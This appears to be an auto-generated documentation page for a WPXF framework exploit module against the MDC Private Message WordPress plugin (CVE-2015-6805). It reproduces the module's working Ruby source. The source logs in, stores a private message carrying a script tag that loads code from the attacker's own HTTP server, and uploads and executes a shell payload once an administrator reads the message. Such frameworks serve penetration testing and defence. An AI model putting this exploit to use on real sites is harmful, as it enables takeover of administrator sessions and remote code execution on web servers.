Class: Wpxf::Exploit::MdcPrivateMessageXssShellUpload

Inherits:
Module
  • Object
show all
Includes:
Wpxf, WordPress::Login, WordPress::Plugin, WordPress::Xss
Defined in:
lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::Xss

#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeMdcPrivateMessageXssShellUpload

Returns a new instance of MdcPrivateMessageXssShellUpload.



9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
 
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 9

def initialize
  super

  update_info(
    name: 'MDC Private Message XSS Shell Upload',
    desc: 'This module exploits a lack of validation in versions '\
          '<= 1.0.0 of the MDC Private Message plugin which '\
          'allows authenticated users of any level to send messages '\
          'containing a script which allows this module to upload and '\
          'execute the payload in the context of the web server once an '\
          'admin reads the message containing the stored script.',
    author: [
      'Chris Kellum', # Vulnerability discovery
      'rastating'     # WPXF module
    ],
    references: [
      ['CVE', '2015-6805'],
      ['WPVDB', '8154'],
      ['EDB', '37907']
    ],
    date: 'Aug 20 2015'
  )

  register_options([
    StringOption.new(
      name: 'username',
      desc: 'The WordPress username to authenticate with',
      required: true
    ),
    StringOption.new(
      name: 'password',
      desc: 'The WordPress password to authenticate with',
      required: true
    ),
    IntegerOption.new(
      name: 'user_id',
      desc: 'The user ID of the user to send the message to',
      default: 1,
      required: true
    ),
    StringOption.new(
      name: 'msg_subject',
      desc: 'The subject of the message that will be sent to the admin',
      required: true,
      default: Utility::Text.rand_alphanumeric(rand(5..20))
    ),
    StringOption.new(
      name: 'msg_body',
      desc: 'The text portion of the message that will be visible to the recipient',
      required: true,
      default: Utility::Text.rand_alphanumeric(rand(10..50))
    ),
  ])
end

Instance Method Details

#checkObject 



64
65
66
 
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 64

def check
  check_plugin_version_from_readme('mdc-private-message', '1.0.0.1')
end

#msg_bodyObject 



76
77
78
 
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 76

def msg_body
  datastore['msg_body']
end

#msg_subjectObject 



72
73
74
 
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 72

def msg_subject
  datastore['msg_subject']
end

#runObject 



80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
 
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 80

def run
  return false unless super

  cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
  return false unless cookie

  # Success will be determined in another procedure, so initialize to false.
  @success = false

  emit_info 'Storing script...'
  emit_info xss_include_script, true
  res = execute_post_request(
    url: wordpress_url_admin_ajax,
    cookie: cookie,
    body: {
      'action'  => 'mdc_send_msg',
      'from'    =>  user_id.to_s,
      'to'      =>  user_id.to_s,
      'subject' => msg_subject,
      'message' => "#{msg_body}<script>#{xss_include_script}</script>"
    }
  )

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_success "Script stored and will be executed when the user views the message"
  start_http_server

  return @success
end

#user_idObject 



68
69
70
 
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 68

def user_id
  normalized_option_value('user_id')
end